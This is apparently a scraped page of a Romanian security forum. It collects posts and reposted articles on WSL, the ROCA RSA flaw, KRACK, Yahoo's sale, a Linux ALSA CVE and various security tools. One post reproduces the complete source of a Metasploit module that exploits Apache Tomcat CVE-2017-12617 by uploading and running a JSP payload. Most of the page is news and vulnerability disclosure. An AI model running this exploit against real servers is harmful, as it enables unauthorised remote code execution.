Leaderboard

A trecut conferinta, parerea personala e ca a fost ceva mai reusita decat cea din anii trecuti. Mai multi oameni, locatie mai misto, CTF-uri, traininguri, 2 track-uri de prezentari... Vorbind de prezentari, RST-ul a fost reprezentat in 2 prezentari: Less Known Web Application Vulnerabilities, Ionut Popescu Man-in-the-browser attacks, Daniel Tomescu Majoritatea prezentarilor au fost publicate pe pagina evenimentului, aici si aici.

https://pastebin.com/aZyyS16w

LMFAO - http://www.newsweek.com/trump-team-leaks-about-israels-hack-kaspersky-lab-could-further-damage-ties-686500 Ca in filmele cu prosti... Americanii spioneaza lumea, dar la randul lor sunt spionati de Rusi care la randul lor sunt spionati de Israelieni - dar cand cei din urma le spun de treaba asta la muricani, aia incep sa trambiteze.

Sysadmins and developers rejoice! WSL is now a fully fledged part of Windows 10, starting with the latest Fall Creators Update. terested in running Linux on Windows 10 with Windows Subsystem for Linux (WSL), but nervous about it being both a beta and only available in Windows 10 developer mode? Your worries are over. In the Windows 10 Fall Creators Update (WinFCU) WSL has graduated to being a Windows 10 feature that can be run by any user. Tested for over a year, WSL on WinFCU is bringing many new features to this combination of the Linux Bash shell and Windows. Besides WSL no longer being a beta or requiring users to be in developer mode, the new features include: Install Linux distros via the Windows Store WSL now runs multiple Linux distros WSL comes to Windows Server & Microsoft Azure VMs WSL now supports USB/serial comms Miscellaneous fixes and improvements Besides Ubuntu, the new WSL-supported Linux distros are SUSE's community openSUSE and its corporate SUSE Linux Enterprise Server (SLES). Fedora and other distros will arrive in the store shortly. If you've previously installed WS, your existing "legacy" Ubuntu instance will continue to work, but it's deprecated. To continue to receive support you should replace it with a new store-delivered instance. Without this, you won't receive Canonical or Microsoft support. To keep your old files, you should tar them and copy them to your Windows file system; for example: `/mnt/c/temp/backups` and then copy them back to your new instance. In addition, instead of jumping through hoops to install Linux on Windows, you can install one or more -- yes, you can have multiple distros on a single Windows 10 system -- Linux distros from the Windows Store. To do this, you must first enable the WSL feature in the "Turn Windows Features on or off" dialog and reboot. No, WSL is not active by default and yes, you must reboot. After rebooting you simply search for "Linux" in the Windows Store, pick a version to install, hit install, and in a few minutes you're good to go. If you already have a Bash instance installed on WSL, you can start afresh with the lxrun /uninstall command. You run this command from the command prompt or PowerShell. Besides being able to install multiple Linux distributions, you can simultaneously run one or more Linux distros. Each distro runs independently of one another. These are neither virtual machines (VMs) nor containers, and that means they need their usual system resources. I, for example, would only want them on systems with at least an additional 2GBs per instance of running WSL. WSL itself requires only minimal system resources. Rich Turner, Microsoft's senior program manager of WSL and Windows Console, wrote: "We don't list [RAM requirements] because, frankly, we don't have any of note! If you don't install WSL, we add no RAM footprint. If you do enable WSL, there's a tiny 850KB driver loaded briefly, and then it shuts down until you start a Linux instance. At that point, you load /init which launches /bin/bash. This causes the 850KB driver to load, and creates Pico Processes for init and bash. So, basically, WSL's RAM requirements are pretty much whatever the RAM is that you need to run each Linux binary, plus around 1MB of working set in total." The Linux distros can also access Windows' host filesystem, networking stack, etc. That means you should be cautious about changing files on the Windows filesystem. Why would you run multiple distros at once? Microsoft points out: You can now install Linux distros right from the Windows Store. Linux developers will be pleased to find that USB serial comms are now supported. This enables your shell scripts and apps to talk to serial ports. WSL also now supports mounting of USB-attached storage devices and network shares. That's the good news, The bad news is it only supports the NT filesystem IO infrastructure. In other words it only supports FAT/FAT32/NTFS formatted storage devices. Want *nix file systems? Microsoft encourages you to upvote and/or comment on the associated UserVoice ask. Digging deeper into the new improvements, under the hood WSL on WinFCU now includes: Improved TCP socket options inc. IP_OPTIONS, IP_ADD_MEMBERSHIP, IP_MULTICAST, etc /etc/hosts will now inherit entries from the Windows hosts file xattr related syscalls support Fixed several filesystem features and capabilities Improved PTRACE support Improved FUTEX support chsh, which enables you to change shells, now works. This enables you to use your favorite shell directly. Shell startup file other than ".bashrc" will now execute. The following syscalls were added for the first time during the FCU cycle: Prlimit64 getxattr, setxattr, listxattr, removexattr As expected, WSL is also on its way to Windows Server and to Microsoft Azure Windows VM instances. This will make WSL even more useful for sysadmins. All these improvements have made it even easier for developers and system administrators to run Linux shell commands on Windows. While this isn't very useful for ordinary desktop users, for serious IT staff it's a real step forward, making Windows more useful in a server and cloud world that's increasingly dominated by Linux. Even on Azure, over a third of VMs are Linux. With WSL, most Linux shell tools are at your command. These include: apt, ssh, find, grep, awk, sed, gpg, wget, tar, vim, emacs, diff, and patch. You can also run popular open-source programming languages such as python, perl, ruby, php, and gcc. In addition, WSL and Bash supports server programs such as the Apache web-server and Oracle's MySQL database management system. In other words, you get a capable Linux development environment running on Windows. While you can run Linux graphical interfaces and programs on WSL, it's more of a stunt than a practical approach at this time. Of course, with a little work... How does WSL work? Dustin Kirkland, a member of Canonical's Ubuntu Product and Strategy executive team, explained: "We're talking about bit-for-bit, checksum-for-checksum Ubuntu ELF binaries running directly in Windows. [WSL] basically perform real-time translation of Linux syscalls into Windows OS syscalls. Linux geeks can think of it sort of the inverse of 'WINE' -- Ubuntu binaries running natively in Windows." Regardless of the technical details of how WSL does what it doess, what matters now is that WSL works very, very well. Enjoy! Via zdnet.com

A newly discovered vulnerability in generation of RSA keys used by a software library adopted in cryptographic smartcards, security tokens and other secure hardware chips manufactured by Infineon Technologies AG allows for a practical factorization attack, in which the attacker computes the private part of an RSA key. The attack is feasible for commonly used key lengths, including 1024 and 2048 bits, and affects chips manufactured as early as 2012, that are now commonplace. Assess your keys now with the provided offline and online detection tools and contact your vendor if you are affected. Major vendors including Microsoft, Google, HP, Lenovo, Fujitsu already released the software updates and guidelines for a mitigation. Full details including the factorization method will be released in 2 weeks at the ACM CCS conference as 'The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli' (ROCA) research paper. Description of the vulnerability A security vulnerability was found in the implementation of RSA keypair generation in a cryptographic library used in a wide range of cryptographic chips produced by Infineon Technologies AG. The product is also integrated in authentication, signature and encryption tokens of other vendors and chips used for Trusted Boot of operating systems. The vulnerability is present in NIST FIPS 140-2 and CC EAL 5+ certified devices since at least the year 2012. The algorithmic vulnerability is characterized by a specific structure of the generated RSA primes, which makes factorization of commonly used key lengths including 1024 and 2048 bits practically possible. Only the knowledge of a public key is necessary and no physical access to the vulnerable device is required. The vulnerability does NOT depend on a weak or a faulty random number generator - all RSA keys generated by a vulnerable chip are impacted. The attack was practically verified for several randomly selected 1024-bit RSA keys and for several selected 2048-bit keys. The specific structure of the primes in question allows for a fast detection of vulnerable keys, even in very large datasets. This property is useful for mitigation (users can assess own keys for vulnerability), but also for potential attackers (keys vulnerable to factorization can be pre-selected, without undergoing time-consuming factorization attempts). The worst cases for the factorization of 1024 and 2048-bit keys are less than 3 CPU-months and 100 CPU-years, respectively, on a single core of a common recent CPU, while the expected time is half of that of the worst case. The factorization can be easily parallelized on multiple CPUs. Where k CPUs are available, the wall time required for the attack will be reduced k-times - allowing for practical factorization in order of hours or days. The worst-case price of the factorization on an Amazon AWS c4 computation instance is $76 for the 1024-bit key and about $40,000 for the 2048-bit key. The difficulty of the factorization attack is not the same for all key lengths and is NOT strictly increasing (some longer keys may take less time to factorize than other shorter ones). The following key length ranges are now considered practically factorizable (time complexity between hours to 1000 CPU years at maximum): 512 to 704 bits, 992 to 1216 bits and 1984 to 2144 bits. Note that 4096-bit RSA key is not practically factorizable now, but may become so, if the attack is improved. The time complexity and cost for the selected key lengths (Intel E5-2650 v3@3GHz Q2/2014): 512 bit RSA keys - 2 CPU hours (the cost of $0.06); 1024 bit RSA keys – 97 CPU days (the cost of $40-$80); 2048 bit RSA keys – 140.8 CPU years, (the cost of $20,000 - $40,000). The vulnerability was found by a close inspection of a large number of RSA keys generated and exported from the manufacturer smartcards by researchers at CRoCS laboratory, Masaryk University, Enigma Bridge and Ca' Foscari University. The full results will be presented at an academic ACM Conference on Computer and Communications Security (ACM CCS '17) starting from October 30th. The vulnerability was disclosed to Infineon Technologies AG, following the responsible disclosure principle, in the first week of February with agreement of an 8 month period before a public disclosure. We cooperated with the manufacturer and other affected parties to help evaluate and mitigate this vulnerability during this period. Major vendors including Microsoft, Google, HP, Lenovo, Fujitsu already released the software updates and guidelines for a mitigation. We are now notifying general public and releasing tools for assessmnet of the individual keys. Impact A remote attacker can compute an RSA private key from the value of a public key. The private key can be misused for impersonation of a legitimate owner, decryption of sensitive messages, forgery of signatures (such as for software releases) and other related attacks. The actual impact of the vulnerability depends on the usage scenario, availability of the public keys and the lengths of keys used. We found and analyzed vulnerable keys in various domains including electronic citizen documents, authentication tokens, trusted boot devices, software package signing, TLS/HTTPS keys and PGP. The currently confirmed number of vulnerable keys found is about 760,000 but possibly up to two to three magnitudes more are vulnerable. The details will be presented in two weeks at the ACM CCS conference. The vulnerable chips are pervasive and not necessarily sold directly by Infineon Technologies AG, as the chips can be embedded inside devices of other manufacturers. Detection tools, mitigation and workarounds The first step is to detect if you use a chip with the vulnerable library. As the vulnerability is present in the on-chip software library and not limited just to a particular batch of hardware, the only reliable way is to generate an RSA keypair on the device and test the public key by the provided tools (see below). It is recommended to test also the keys already in use. We believe the tools are very accurate - it is highly unlikely that a secure key would be flagged, as well as that a vulnerable key would be missed. We provide the following tools: Offline testers: Python/Java/C++ applications and tutorials (https://github.com/crocs-muni/roca). We release all offline tools under the MIT license so it can be embedded into other testing applications and services. Online testers: Upload public key to https://keychest.net/roca or https://keytester.cryptosense.com to test your key. Email S-MIME/PGP tester: Send a signed email to roca@keychest.net to obtain an automatic email response with the analysis of the signing key vulnerability. If a vulnerable key is found, then you should contact your device vendor for further advice. The following general advices may apply: Apply the software update if available. Replace the device with one without the vulnerable library. Generate a secure RSA keypair outside the device (e.g., via the OpenSSL library) and import it to the device. We are not aware of any vulnerability in connection with the actual use of the key, only the generation phase has a confirmed vulnerability. Use other cryptographic algorithm (e.g., ECC) instead of RSA on affected devices. Apply additional risk management within your environment, if the RSA key in use is detected as vulnerable. Use key lengths which are not currently impacted (e.g., 3936 bits) by our factorization method. Be aware: use this specific mitigation only as a last resort, as the attack may be improved. Team The vulnerability was discovered by Slovak and Czech security researchers from the Centre for Research on Cryptography and Security at Masaryk University, Czech Republic; Enigma Bridge Ltd, Cambridge, UK; and Ca' Foscari University of Venice, Italy. Updates 2nd of November 2017 - Presentation of all details at the ACM CCS conference (to come) 16th of October 2017 - The initial version of the public disclosure published May to October 2017 - Cooperation with the manufacturer and other affected parties to help evaluate and mitigate the vulnerability 1st of February - The vulnerability disclosed to Infineon Technologies AG End of January - The vulnerability found Q&A Techincal references Infineon, Information on software update of RSA key generation function: https://www.infineon.com/RSA-update Infineon, Information on TPM firmware update for Microsoft Windows systems https://www.infineon.com/cms/en/product/promopages/tpm-update/?redirId=59160 Microsoft Vulnerability in TPM could allow Security Feature Bypass: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170012 Google, The Chromium project Trusted Platform Module firmware vulnerability: https://sites.google.com/a/chromium.org/dev/chromium-os/tpm_firmware_update Media ArsTechnica: https://arstechnica.com/information-technology/2017/10/crypto-failure-cripples-millions-of-high-security-keys-750k-estonian-ids/ Forbes: https://www.forbes.com/sites/thomasbrewster/2017/10/16/worse-than-krack-google-and-microsoft-patch-massive-5-year-old-encryption-hole/#40c81a9447c3 Estonian ID cards: http://news.err.ee/616732/potential-security-risk-could-affect-750-000-estonian-id-cards The Register: https://www.theregister.co.uk/2017/10/16/roca_crypto_vuln_infineon_chips/ Paper details Paper title: The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli [ACM CCS 2017] Authors: Matus Nemec, Marek Sys, Petr Svenda, Dusan Klinec and Vashek Matyas Primary contact: Petr Svenda svenda@fi.muni.cz Conference page: ACM CCS 2017 Download author pre-print of the paper: (to be released 2nd November) Bibtex (regular paper): @inproceedings{2017-ccs-nemec, Author = {Matus Nemec and Marek Sys and Petr Svenda and Dusan Klinec and Vashek Matyas}, Title = {The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli}, BookTitle = {to appear at 24th ACM Conference on Computer and Communications Security (CCS'2017)}, Year = {2017}, ISBN = {978-1-4503-4946-8/17/10}, Publisher = {ACM} } Source

[...] So unless your Wi-Fi password looks something like a cat's hairball (e.g. ":SNEIufeli7rc" -- which is not guessable with a few million tries by a computer), a local attacker had the capability to determine the password, decrypt all the traffic, and join the network before KRACK. KRACK is, however, relevant for enterprise Wi-Fi networks: networks where you needed to accept a cryptographic certificate to join initially and have to provide both a username and password. KRACK represents a new vulnerability for these networks. Depending on some esoteric details, the attacker can decrypt encrypted traffic and, in some cases, inject traffic onto the network. But in none of these cases can the attacker join the network completely. And the most significant of these attacks affects Linux devices and Android phones, they don't affect Macs, iPhones, or Windows systems. Even when feasible, these attacks require physical proximity: An attacker on the other side of the planet can't exploit KRACK, only an attacker in the parking lot can. [...] Nicholas Weaver [...] One of the problems with IEEE is that the standards are highly complex and get made via a closed-door process of private meetings. More importantly, even after the fact, they're hard for ordinary security researchers to access. Go ahead and google for the IETF TLS or IPSec specifications -- you'll find detailed protocol documentation at the top of your Google results. Now go try to Google for the 802.11i standards. I wish you luck. The IEEE has been making a few small steps to ease this problem, but they're hyper-timid incrementalist bullshit. There's an IEEE program called GET that allows researchers to access certain standards (including 802.11) for free, but only after they've been public for six months -- coincidentally, about the same time it takes for vendors to bake them irrevocably into their hardware and software. This whole process is dumb and -- in this specific case -- probably just cost industry tens of millions of dollars. It should stop. [...] Matthew Green

Si apoi, dupa ce s-a facut vanzarea: https://www.sec.gov/Archives/edgar/data/732712/000073271217000003/a2017_10x3xoathxexhibitx991.htm Mda...

Patch-urile sunt disponibile de ani de zile...

Cresterea automatizarii / robotizarii in diverse domenii e prezentata mai tot timpul apocaliptic, desi nu e cazul. Principalul rol al automatizarii e sa ajute oamenii sa isi desfasoare activitatile, nu sa ii inlocuiasca. Se pot automatiza activitatile repetitive, lipsite de creatie, lipsite de umanitate. Asfel oamenii se pot concentra mai mult pe cercetare, creativitate, arte, sporturi, dezvoltare personala etc. Da, unele meserii vor disparea. Altele se vor transforma. Dar daca treaba ta de zi cu zi poate fi inlocuita de AI si robotei, atunci probabil ca deja iti irosesti viata cu activitati monotone si lipsite de creatie...

Subestimezi instinctul de supravietuire al bacteriilor/parazitiilor. Isi gasesc intotdeauna o gazda de care sa se lipeasca si pe spatele careia sa se inmulteasca. Insa sunt si ei oarecum necesari pentru evolutia speciei (mai putin unii de misuna pe aici pe forum )

Paper - https://papers.mathyvanhoef.com/ccs2017.pdf

A suite of utilities simplilfying linux networking stack performance troubleshooting and tuning. https://pypi.python.org/pypi/netutils-linux netutils-linux It's a useful utils to simplify Linux network troubleshooting and performance tuning, developed in order to help Carbon Reductor techsupport and automate the whole linux performance tuning process out of box (ok, except the best RSS layout detection with multiple network devices). These utils may be useful for datacenters and internet service providers with heavy network workload (you probably wouldn't see an effect at your desktop computer). It's now in production usage with 300+ deployment and save us a lot of time with hardware and software settings debugging. Inspired by packagecloud's blog post. Installation You'll need pip. pip install netutils-linux Utils Monitoring All these top-like utils don't require root priveledges or sudo usage. So you can install and use them as non-priveledged user if you care about security. pip install --user netutils-linux Brief explanation about highlighting colors for CPU and device groups: green and red are for NUMA-nodes, blue and yellow for CPU sockets. Screenshots are taken from different hosts with different hardware. network-top Most useful util in this repo that includes almost all linux network stack performance metrics and allow to monitor interrupts, soft interrupts, network processing statistic for devices and CPUs. Based on following files: /proc/interrupts (vectors with small amount of irqs/second are hidden by default) /proc/net/softnet_stat - packet distribution and errors/squeeze rate between CPUs. /proc/softirqs (only NET_RX and NET_TX values). /sys/class/net/<NET_DEVICE>/statistic/<METRIC> files (you can specify units, mbits are default) There are also separate utils if you want to look at only specific metrics: irqtop, softirq-top, softnet-stat-top, link-rate. snmptop Basic /proc/net/smmp file watcher. Tuning rss-ladder Automatically set smp_affinity_list for IRQ of NIC rx/tx queues that usually work on CPU0 out of the box). Based on lscpu's output. It also supports double/quad ladder in case of multiprocessor systems (but you better explicitly specify queue count == core per socket as NIC's driver's param). Example output: # rss-ladder eth1 0 - distributing interrupts of eth1 (-TxRx-) on socket 0 - eth1: irq 67 eth1-TxRx-0 -> 0 - eth1: irq 68 eth1-TxRx-1 -> 1 - eth1: irq 69 eth1-TxRx-2 -> 2 - eth1: irq 70 eth1-TxRx-3 -> 3 - eth1: irq 71 eth1-TxRx-4 -> 8 - eth1: irq 72 eth1-TxRx-5 -> 9 - eth1: irq 73 eth1-TxRx-6 -> 10 - eth1: irq 74 eth1-TxRx-7 -> 11 autorps Enables RPS on all available CPUs of NUMA node local for the NIC for all NIC's rx queues. It may be good for small servers with cheap network cards. You also can explicitely pass --cpus or --cpu-mask. Example output: # autorps eth0 Using mask 'fc0' for eth0-rx-0. maximize-cpu-freq Sets every CPU scaling governor mode to performance and set max scaling value for min scaling value. So you will be able to use all power of your processor (useful for latency sensible systems). rx-buffers-increase rx-buffers-increase utils, that finds and sets compromise-value between avoiding dropped/missing pkts and keeping a latency low. Example output: # ethtool -g eth1 Ring parameters for eth1: Pre-set maximums: RX: 4096 ... Current hardware settings: RX: 256 # rx-buffers-increase eth1 run: ethtool -G eth1 rx 2048 # rx-buffers-increase eth1 eth1's rx ring buffer already has fine size. # ethtool -g eth1 Ring parameters for eth1: Pre-set maximums: RX: 4096 ... Current hardware settings: RX: 2048 Hardware and its configuration rating server-info Much alike lshw but designed for network processing role of server. # server-info show cpu: info: Architecture: x86_64 BogoMIPS: 6799.9899999999998 Byte Order: Little Endian CPU MHz: 3399.998 CPU family: 6 CPU op-mode(s): 32-bit, 64-bit CPU(s): 2 Core(s) per socket: 1 Hypervisor vendor: KVM L1d cache: 32K L1i cache: 32K L2 cache: 4096K Model: 13 Model name: QEMU Virtual CPU version (cpu64-rhel6) NUMA node(s): 1 NUMA node0 CPU(s): 0,1 On-line CPU(s) list: 0,1 Socket(s): 2 Stepping: 3 Thread(s) per core: 1 Vendor ID: GenuineIntel Virtualization type: full layout: '0': '0' '1': '1' disk: sr0: model: QEMU DVD-ROM vda: model: null size: 64424509440 type: HDD memory: MemFree: 158932 MemTotal: 1922096 SwapFree: 4128764 SwapTotal: 4128764 net: eth1: buffers: cur: 2048 max: 4096 conf: ip: 10.144.63.1/24 vlan: true driver: driver: e1000 version: 7.3.21-k8-NAPI queues: own: [] rx: [] rxtx: [] shared: - virtio1, eth0, eth1 tx: [] unknown: [] It also can rate hardware and its features in range of 1..10. # server-info rate cpu: BogoMIPS: 7 CPU MHz: 7 CPU(s): 1 Core(s) per socket: 1 L3 cache: 1 Socket(s): 10 Thread(s) per core: 10 Vendor ID: 10 disk: sr0: size: 1 type: 2 vda: size: 1 type: 1 memory: MemTotal: 1 SwapTotal: 10 net: eth1: buffers: cur: 5 max: 10 driver: 1 queues: 1 system: Hypervisor vendor: 1 Virtualization type: 1 Download: netutils-linux-master.zip or: git clone https://github.com/strizhechenko/netutils-linux.git Source: https://github.com/strizhechenko/netutils-linux

Multumesc frumos.

Internetworking with TCP/IP Volume One (6th Edition)

omul a pus poza cu tableta nu cu frigider

Yahoo s-a dus, rămășițele sale devin Altaba by unacomn on 10/01/2017 Achiziția companiei Yahoo de către conglomeratul de telecomunicații american Verizon s-a încheiat. Această afacere se află în desfășurare încă din vara anului trecut, trecând de atunci peste câteva hopuri, după ce Yahoo a dezvăluit că a fost de două ori victima a celui mai mare incident de hacking din istoria internetului, fiind periclitate inițial o jumătate de miliard de conturi, iar apoi un miliard întreg. Totuși, în ciuda revoltării generale la adresa modului în care Yahoo a tratat incidentul, achiziția nu a fost afectată, iar Verizon a plătit suma de 4.8 miliarde de dolari pentru ceea ce a fost odată cea mai valoroasă companie de internet din lume. După această achiziție, toate funcțiile principale ale Yahoo vor trece sub tutela Verizon, urmând ca investițiile companiei în Alibaba și alte companii din Asia să fie consolidate sub numele Altaba. Aceasta componentă va rămâne independentă și în efect reprezintă tot ce mai rămâne din Yahoo care să nu fie o proprietate a Verizon. Conducerea curentă a Yahoo și-a luat tălpășița, Marissa Mayer nu mai este CEO, co-fondatorul companiei David Filo nu se mai află acolo, iar o mare parte din toți ceilalți care au ghidat compania spre situația sa precară vor căuta acum alte locuri de muncă. Serviciile Yahoo vor rămâne în funcțiune, dacă încă le mai folosește cineva. [Ars Technica] Sursa: https://zonait.tv/yahoo-nu-mai-exista/

Security researchers have discovered a new privilege-escalation vulnerability in Linux kernel that could allow a local attacker to execute code on the affected systems with elevated privileges. Discovered by Venustech ADLab (Active-Defense Lab) researchers, the Linux kernel vulnerability (CVE-2017-15265) is due to a use-after-free memory error in the Advanced Linux Sound Architecture (ALSA) sequencer interface of the affected application. The Advanced Linux Sound Architecture (ALSA) provides audio and MIDI functionality to the Linux operating system, and also bundles a userspace driven library for application developers, enabling direct (kernel) interaction with sound devices through ALSA libraries. Successful exploitation of this vulnerability requires an attacker—with local access on the targeted system—to execute a maliciously crafted application on a targeted system, which allows the attacker to elevate his privilege to root on the targeted system, a Cisco advisory warned. The vulnerability affects major distributions of the Linux operating system including RedHat, Debian, Ubuntu, and Suse, and is triggered by a slip in snd_seq_create_port(). The vulnerability has been patched in Linux kernel version 4.13.4-2, which was fixed just by taking the refcount properly at "snd_seq_create_port()" and letting the caller unref the object after use. Administrators are advised to apply the appropriate updates on their Linux distributions as soon as they receive them from their respective distro. They're also recommended to allow only trusted users to access local systems and always monitor affected systems. This flaw is yet another privilege escalation vulnerability recently uncovered in the Linux kernel. Last month, a high-risk 2-year-old potential local privilege escalation flaw was patched in the Linux kernel that affected all major Linux distributions, including Red Hat, Debian, and CentOS. In February, another privilege-escalation vulnerability that dates back to 2011 disclosed and patched in the Linux kernel which also affected major Linux distro, including Redhat, Debian, OpenSUSE, and Ubuntu. Via thehackernews.com

Cred ca, teoretic, daca AI s-ar dezvolta suficient, multe pozitii IT s-ar putea inlocui. La inceput, o sa fie AI care face "munca de jos", si noi sa ne batem capul doar cu concepte mai high-level (pana ajunge si AI-ul acolo, and then repeat). Totusi, poate(sper) o sa fie schimbari pozitive per total, poate o mai scoata lumea din "rat race" si oamenii o sa aiba timp sa fie mai mult oameni, si mai putin sclavi moderni, ceea ce s-ar putea sa si imbunatateasca relatiile dintre oameni. Sunt multi oameni care nu fac deloc ceva ce le place, pt ca isi consuma aproape tot timpul cu un job care ii ajuta doar sa supravietuiasca, si asta contribuie la multe lucruri negative. Dar o posibila parte negativa e ca daca ai tehnologie care face aproape totul pentru tine ca om, multi nu o sa isi mai exerseze abilitatile cognitive prea mult, ducand astfel la o scadere a inteligentei (am ajuns la acest nivel de inteligenta ca oameni tocmai prin rezolvarea problemelor pe care le intampinam), cu alte cuvinte lumea o sa se prosteasca si mai tare, ceea ce o sa fie un punct de exploatat pentru unii. Desigur, TV-ul si internetul folosit doar pentru divertisment fac asta deja cu multe persoane, dar sper sa nu creasca prea tare numarul lor in viitor.

@QuoVadis mi-ai amintit de bijuteria asta

E bine sa visezi dar cu cap. Cine stie ce a fumat omul... inainte sa scoata pe gura lucrurile alea. Daca avea atata incredere in tehnologie nu se apucau sa falsifice emisiile de carbon la milioane de masini ca sa jupeasca multe milioane euro. Poate ca din "ivory tower"-ul lui lucrurile par mai aproape de realitate dar nu a apucat sa traiasca o viata de rand sa vada in ce stare e infrastructura unei tari, sa vada cat de multi oameni depind de food banks si ajutoare sociale, de ceea ce sunt in stare unii "oameni" sa faca altora, etc. Cu alte cuvinte sa vada mizeria umana in cele mai depravate si ascunse unghiuri. Cat despre.. Babuinland multi inca se caca in fundul curtii si beau spirt Mona tras prin paine. A se adauga +500 ani la orice estimare de ani.

The Worldpay Payments & IoT Hackathon taking place this November 3-5 in Bucharest at the Impact Hub. Participants will receive training on IoT and Worldpay technologies! I can’t forget to mention the prizepool worth 13,500 Lei will be awarded among the winning teams! Here is the media kit

Cyber Security Base with F-Secure is a free course series by University of Helsinki in collaboration with F-Secure Cyber Security Academy that focuses on building core knowledge and abilities related to the work of a cyber security professional. About the Course Series The course series consists of multiple smaller courses, each with a specific theme. Themes include a brief introduction to cyber security, operational security, web software development, types of vulnerabilities typical of web software, discovery and mitigation of such vulnerabilities, and advanced topics such as secure software architectures and cryptography. There will be several case studies as well as projects for participants. At the end of the course series, we'll also organize a friendly competition where participants get to find and fix vulnerabilities within a limited time frame. The course will launch on 31st of October, 2017. More information at: mooc.fi. The material for the last year's course is still available here. Leave us your email and we will send you updates about Cyber Security Base with F‑Secure https://cybersecuritybase.github.io/

This Metasploit module uploads a jsp payload and executes it. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Tomcat RCE via JSP Upload Bypass', 'Description' => %q{ This module uploads a jsp payload and executes it. }, 'Author' => 'peewpw', 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2017-12617' ], [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ], [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ] ], 'Privileged' => false, 'Platform' => %w{ linux win }, # others? 'Targets' => [ [ 'Automatic', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ], [ 'Java Windows', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ], [ 'Java Linux', { 'Arch' => ARCH_JAVA, 'Platform' => 'linux' } ] ], 'DisclosureDate' => 'Oct 03 2017', 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]), Opt::RPORT(8080) ]) end def check testurl = Rex::Text::rand_text_alpha(10) testcontent = Rex::Text::rand_text_alpha(10) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"), 'method' => 'PUT', 'data' => "<% out.println(\"#{testcontent}\");%>" }) res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"), 'method' => 'GET' }) if res1 && res1.body.include?(testcontent) send_request_cgi( opts = { 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"), 'method' => 'DELETE' }, timeout = 1 ) return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit print_status("Uploading payload...") testurl = Rex::Text::rand_text_alpha(10) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp/"), 'method' => 'PUT', 'data' => payload.encoded }) if res && res.code == 201 res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{testurl}.jsp"), 'method' => 'GET' }) if res1 && res1.code == 200 print_status("Payload executed!") else fail_with(Failure::PayloadFailed, "Failed to execute the payload") end else fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end end # 0day.today [2017-10-13] # Source: 0day.today

Synopsis: Small and highly portable detection tests mapped to the Mitre ATT&CK Framework. Link: https://github.com/redcanaryco/atomic-red-team (via https://twitter.com/redcanaryco/status/918236402814394368)

Synopsis: PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system. Link: https://github.com/ufrisk/pcileech/

Your Computer’s Hard Drive Can Be Used to Listen to What You’re Saying Link: https://blog.hackster.io/your-computers-hard-drive-can-be-used-to-listen-to-what-you-re-saying-808b83f19f80

OS X Auditor is a free Mac OS X computer forensics tool. OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze: the kernel extensions the system agents and daemons the third party's agents and daemons the old and deprecated system and third party's startup items the users' agents the users' downloaded files the installed applications It extracts: the users' quarantined files the users' Safari history, downloads, topsites, LastSession, HTML5 databases and localstore the users' Firefox cookies, downloads, formhistory, permissions, places and signons the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage the users' social and email accounts the WiFi access points the audited system has been connected to (and tries to geolocate them) It also looks for suspicious keywords in the .plist themselves. It can verify the reputation of each file on: Team Cymru's MHR VirusTotal your own local database It can aggregate all logs from the following directories into a zipball: /var/log (-> /private/var/log) /Library/logs the user's ~/Library/logs Finally, the results can be: rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep) rendered as a HTML log file sent to a Syslog server Author Jean-Philippe Teissier - @Jipe_ & al. Support OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector. If you are looking for a production / corporate solution I do recommend you to move to osxcollector (https://github.com/Yelp/osxcollector) How to install Just copy all files from GitHub. Dependencies If you plan to run OS X Auditor on a Mac, you will get a full plist parsing support with the OS X Foundation through pyobjc: pip install pyobjc If you can't install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some troubles with the plist parsing: pip install biplist pip install plist These dependencies will be removed when a working native plist module will be available in python How to run OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare) OS X Auditor is maintained to work on the lastest OS X version. It will do its best on older OS X versions. You must run it as root (or via sudo) if you want to use is on a running system, otherwise it won't be able to access some system and other users' files If you're using API keys from environment variables (see below), you need to use the sudo -E to use the users environment variables Type osxauditor.py -h to get all the available options, then run it with the selected options eg. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html Setting Environment Variables VirusTotal API: export VT_API_KEY=aaaabbbbccccddddeeee Changelog Download: OSXAuditor-master.zip or git clone https://github.com/jipegit/OSXAuditor.git Source: https://github.com/jipegit/OSXAuditor

Hacking Soft Tokens Advanced Reverse Engineering on Android Bernhard Mueller © 2016 Vantage Point Security Pte. Ltd. Table of Contents Introduction............................................................................................................................................................... 5 Mobile One-Time Password Token Overview.................................................................................................... 6 OATH TOTP..................................................................................................................................................................................6 Proprietary Algorithms...................................................................................................................................................................7 Provisioning......................................................................................................................................................................................7 Attacks...............................................................................................................................................................................................8 Retrieval from Memory..............................................................................................................................................................9 Code Lifting and Instrumentation 